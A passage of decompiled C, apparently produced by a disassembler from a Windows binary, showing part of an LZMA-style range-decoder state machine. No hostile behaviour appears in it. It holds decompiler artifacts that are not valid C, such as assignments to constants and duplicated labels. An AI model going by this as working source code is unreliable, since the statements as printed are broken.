                                  												if( *(__ebp - 0x38) >= 4) {
                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                  													if( *(__ebp - 0x38) >= 0xa) {
                                  														_t98 = __ebp - 0x38;
                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                  														__eflags =  *_t98;
                                  													} else {
                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  													}
                                  												} else {
                                  													 *(__ebp - 0x38) = 0;
                                  												}
                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                  												if( *(__ebp - 0x34) == __edx) {
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													goto L61;
                                  												} else {
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__ecx =  *(__ebp - 8);
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  													goto L41;
                                  												}
                                  											case 7:
                                  												goto L0;
                                  											case 8:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x84) = 0xa;
                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  												} else {
                                  													__eax =  *(__ebp - 0x38);
                                  													__ecx =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                  													 *(__ebp - 0x84) = 9;
                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  												}
                                  												while(1) {
                                  													L132:
                                  													 *(_t621 - 0x54) = _t614;
                                  													goto L133;
                                  												}
                                  											case 9:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													goto L89;
                                  												}
                                  												__eflags =  *(__ebp - 0x60);
                                  												if( *(__ebp - 0x60) == 0) {
                                  													goto L171;
                                  												}
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                  												__eflags = _t258;
                                  												0 | _t258 = _t258 + _t258 + 9;
                                  												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                  												goto L75;
                                  											case 0xa:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x84) = 0xb;
                                  													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t621 - 0x54) = _t614;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x28);
                                  												goto L88;
                                  											case 0xb:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__ecx =  *(__ebp - 0x24);
                                  													__eax =  *(__ebp - 0x20);
                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												} else {
                                  													__eax =  *(__ebp - 0x24);
                                  												}
                                  												__ecx =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												L88:
                                  												__ecx =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x2c) = __eax;
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												L89:
                                  												__eax =  *(__ebp - 4);
                                  												 *(__ebp - 0x80) = 0x15;
                                  												__eax =  *(__ebp - 4) + 0xa68;
                                  												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  												goto L68;
                                  											case 0xc:
                                  												L99:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xc;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t334 = __ebp - 0x70;
                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t334;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												__eax =  *(__ebp - 0x2c);
                                  												goto L101;
                                  											case 0xd:
                                  												L37:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xd;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t122 = __ebp - 0x70;
                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t122;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L39:
                                  												__eax =  *(__ebp - 0x40);
                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  													goto L48;
                                  												}
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													goto L54;
                                  												}
                                  												L41:
                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  												 *(__ebp - 0x48) = __eax;
                                  												__eax = __eax + 1;
                                  												__eax = __eax << 8;
                                  												__eax = __eax + __ebx;
                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edx = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													 *(__ebp - 0x40) = 1;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													__ebx = __ebx + __ebx + 1;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edx;
                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L39;
                                  												} else {
                                  													goto L37;
                                  												}
                                  											case 0xe:
                                  												L46:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xe;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t156 = __ebp - 0x70;
                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t156;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												while(1) {
                                  													L48:
                                  													__eflags = __ebx - 0x100;
                                  													if(__ebx >= 0x100) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x58);
                                  													__edx = __ebx + __ebx;
                                  													__ecx =  *(__ebp - 0x10);
                                  													__esi = __edx + __eax;
                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                  													__ax =  *__esi;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__edi = __ax & 0x0000ffff;
                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                  													if( *(__ebp - 0xc) >= __ecx) {
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  														__cx = __ax;
                                  														_t170 = __edx + 1; // 0x1
                                  														__ebx = _t170;
                                  														__cx = __ax >> 5;
                                  														__eflags = __eax;
                                  														 *__esi = __ax;
                                  													} else {
                                  														 *(__ebp - 0x10) = __ecx;
                                  														0x800 = 0x800 - __edi;
                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  														__ebx = __ebx + __ebx;
                                  														 *__esi = __cx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													 *(__ebp - 0x44) = __ebx;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														continue;
                                  													} else {
                                  														goto L46;
                                  													}
                                  												}
                                  												L54:
                                  												_t173 = __ebp - 0x34;
                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  												__eflags =  *_t173;
                                  												goto L55;
                                  											case 0xf:
                                  												L58:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xf;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t203 = __ebp - 0x70;
                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t203;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L60:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													L55:
                                  													__al =  *(__ebp - 0x44);
                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  													goto L56;
                                  												}
                                  												L61:
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t217 = __edx + 1; // 0x1
                                  													__ebx = _t217;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L60;
                                  												} else {
                                  													goto L58;
                                  												}
                                  											case 0x10:
                                  												L109:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x10;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t365 = __ebp - 0x70;
                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t365;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												goto L111;
                                  											case 0x11:
                                  												L68:
                                  												_t614 =  *(_t621 - 0x58);
                                  												 *(_t621 - 0x84) = 0x12;
                                  												while(1) {
                                  													L132:
                                  													 *(_t621 - 0x54) = _t614;
                                  													goto L133;
                                  												}
                                  											case 0x12:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 0x58);
                                  													 *(__ebp - 0x84) = 0x13;
                                  													__esi =  *(__ebp - 0x58) + 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t621 - 0x54) = _t614;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												__eflags = __eax;
                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                  												goto L130;
                                  											case 0x13:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													_t469 = __ebp - 0x58;
                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  													__eflags =  *_t469;
                                  													 *(__ebp - 0x30) = 0x10;
                                  													 *(__ebp - 0x40) = 8;
                                  													L144:
                                  													 *(__ebp - 0x7c) = 0x14;
                                  													goto L145;
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												 *(__ebp - 0x30) = 8;
                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  												L130:
                                  												 *(__ebp - 0x58) = __eax;
                                  												 *(__ebp - 0x40) = 3;
                                  												goto L144;
                                  											case 0x14:
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  												__eax =  *(__ebp - 0x80);
                                  												 *(_t621 - 0x88) = _t542;
                                  												goto L1;
                                  											case 0x15:
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  												goto L120;
                                  											case 0x16:
                                  												__eax =  *(__ebp - 0x30);
                                  												__eflags = __eax - 4;
                                  												if(__eax >= 4) {
                                  													_push(3);
                                  													_pop(__eax);
                                  												}
                                  												__ecx =  *(__ebp - 4);
                                  												 *(__ebp - 0x40) = 6;
                                  												__eax = __eax << 7;
                                  												 *(__ebp - 0x7c) = 0x19;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L145;
                                  											case 0x17:
                                  												L145:
                                  												__eax =  *(__ebp - 0x40);
                                  												 *(__ebp - 0x50) = 1;
                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  												goto L149;
                                  											case 0x18:
                                  												L146:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x18;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t484 = __ebp - 0x70;
                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t484;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L148:
                                  												_t487 = __ebp - 0x48;
                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                  												__eflags =  *_t487;
                                  												L149:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__ecx =  *(__ebp - 0x40);
                                  													__ebx =  *(__ebp - 0x50);
                                  													0 = 1;
                                  													__eax = 1 << __cl;
                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  													__eax =  *(__ebp - 0x7c);
                                  													 *(__ebp - 0x44) = __ebx;
                                  													while(1) {
                                  														 *(_t621 - 0x88) = _t542;
                                  														goto L1;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x50);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  												__eax =  *(__ebp - 0x58);
                                  												__esi = __edx + __eax;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__ax =  *__esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													__cx = __ax >> 5;
                                  													__eax = __eax - __ecx;
                                  													__edx = __edx + 1;
                                  													__eflags = __edx;
                                  													 *__esi = __ax;
                                  													 *(__ebp - 0x50) = __edx;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L148;
                                  												} else {
                                  													goto L146;
                                  												}
                                  											case 0x19:
                                  												__eflags = __ebx - 4;
                                  												if(__ebx < 4) {
                                  													 *(__ebp - 0x2c) = __ebx;
                                  													L119:
                                  													_t393 = __ebp - 0x2c;
                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                  													__eflags =  *_t393;
                                  													L120:
                                  													__eax =  *(__ebp - 0x2c);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  														goto L170;
                                  													}
                                  													__eflags = __eax -  *(__ebp - 0x60);
                                  													if(__eax >  *(__ebp - 0x60)) {
                                  														goto L171;
                                  													}
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  													__eax =  *(__ebp - 0x30);
                                  													_t400 = __ebp - 0x60;
                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  													__eflags =  *_t400;
                                  													goto L123;
                                  												}
                                  												__ecx = __ebx;
                                  												__eax = __ebx;
                                  												__ecx = __ebx >> 1;
                                  												__eax = __ebx & 0x00000001;
                                  												__ecx = (__ebx >> 1) - 1;
                                  												__al = __al | 0x00000002;
                                  												__eax = (__ebx & 0x00000001) << __cl;
                                  												__eflags = __ebx - 0xe;
                                  												 *(__ebp - 0x2c) = __eax;
                                  												if(__ebx >= 0xe) {
                                  													__ebx = 0;
                                  													 *(__ebp - 0x48) = __ecx;
                                  													L102:
                                  													__eflags =  *(__ebp - 0x48);
                                  													if( *(__ebp - 0x48) <= 0) {
                                  														__eax = __eax + __ebx;
                                  														 *(__ebp - 0x40) = 4;
                                  														 *(__ebp - 0x2c) = __eax;
                                  														__eax =  *(__ebp - 4);
                                  														__eax =  *(__ebp - 4) + 0x644;
                                  														__eflags = __eax;
                                  														L108:
                                  														__ebx = 0;
                                  														 *(__ebp - 0x58) = __eax;
                                  														 *(__ebp - 0x50) = 1;
                                  														 *(__ebp - 0x44) = 0;
                                  														 *(__ebp - 0x48) = 0;
                                  														L112:
                                  														__eax =  *(__ebp - 0x40);
                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  															_t391 = __ebp - 0x2c;
                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  															__eflags =  *_t391;
                                  															goto L119;
                                  														}
                                  														__eax =  *(__ebp - 0x50);
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  														__eax =  *(__ebp - 0x58);
                                  														__esi = __edi + __eax;
                                  														 *(__ebp - 0x54) = __esi;
                                  														__ax =  *__esi;
                                  														__ecx = __ax & 0x0000ffff;
                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                  														if( *(__ebp - 0xc) >= __edx) {
                                  															__ecx = 0;
                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  															__ecx = 1;
                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  															__ebx = 1;
                                  															__ecx =  *(__ebp - 0x48);
                                  															__ebx = 1 << __cl;
                                  															__ecx = 1 << __cl;
                                  															__ebx =  *(__ebp - 0x44);
                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                  															__cx = __ax;
                                  															__cx = __ax >> 5;
                                  															__eax = __eax - __ecx;
                                  															__edi = __edi + 1;
                                  															__eflags = __edi;
                                  															 *(__ebp - 0x44) = __ebx;
                                  															 *__esi = __ax;
                                  															 *(__ebp - 0x50) = __edi;
                                  														} else {
                                  															 *(__ebp - 0x10) = __edx;
                                  															0x800 = 0x800 - __ecx;
                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  															 *__esi = __dx;
                                  														}
                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                  															L111:
                                  															_t368 = __ebp - 0x48;
                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                  															__eflags =  *_t368;
                                  															goto L112;
                                  														} else {
                                  															goto L109;
                                  														}
                                  													}
                                  													__ecx =  *(__ebp - 0xc);
                                  													__ebx = __ebx + __ebx;
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													 *(__ebp - 0x44) = __ebx;
                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  														__ecx =  *(__ebp - 0x10);
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  														__ebx = __ebx | 0x00000001;
                                  														__eflags = __ebx;
                                  														 *(__ebp - 0x44) = __ebx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L101:
                                  														_t338 = __ebp - 0x48;
                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                  														__eflags =  *_t338;
                                  														goto L102;
                                  													} else {
                                  														goto L99;
                                  													}
                                  												}
                                  												__edx =  *(__ebp - 4);
                                  												__eax = __eax - __ebx;
                                  												 *(__ebp - 0x40) = __ecx;
                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  												goto L108;
                                  											case 0x1a:
                                  												L56:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1a;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x68);
                                  												__al =  *(__ebp - 0x5c);
                                  												__edx =  *(__ebp - 8);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *( *(__ebp - 0x68)) = __al;
                                  												__ecx =  *(__ebp - 0x14);
                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                  												__eax = __ecx + 1;
                                  												__edx = 0;
                                  												_t192 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t192;
                                  												goto L79;
                                  											case 0x1b:
                                  												L75:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1b;
                                  													goto L170;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t274 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t274;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												_t283 = __ebp - 0x64;
                                  												 *_t283 =  *(__ebp - 0x64) - 1;
                                  												__eflags =  *_t283;
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												L79:
                                  												 *(__ebp - 0x14) = __edx;
                                  												goto L80;
                                  											case 0x1c:
                                  												while(1) {
                                  													L123:
                                  													__eflags =  *(__ebp - 0x64);
                                  													if( *(__ebp - 0x64) == 0) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__edx =  *(__ebp - 8);
                                  													__cl =  *(__eax + __edx);
                                  													__eax =  *(__ebp - 0x14);
                                  													 *(__ebp - 0x5c) = __cl;
                                  													 *(__eax + __edx) = __cl;
                                  													__eax = __eax + 1;
                                  													__edx = 0;
                                  													_t414 = __eax %  *(__ebp - 0x74);
                                  													__eax = __eax /  *(__ebp - 0x74);
                                  													__edx = _t414;
                                  													__eax =  *(__ebp - 0x68);
                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  													__eflags =  *(__ebp - 0x30);
                                  													 *( *(__ebp - 0x68)) = __cl;
                                  													 *(__ebp - 0x14) = _t414;
                                  													if( *(__ebp - 0x30) > 0) {
                                  														continue;
                                  													} else {
                                  														L80:
                                  														 *(__ebp - 0x88) = 2;
                                  														goto L1;
                                  													}
                                  												}
                                  												 *(__ebp - 0x88) = 0x1c;
                                  												goto L170;
                                  										}
                                  									}
                                  									L171:
                                  									_t544 = _t543 | 0xffffffff;
                                  									goto L172;
                                  								}
                                  							}
                                  						}
                                  					}
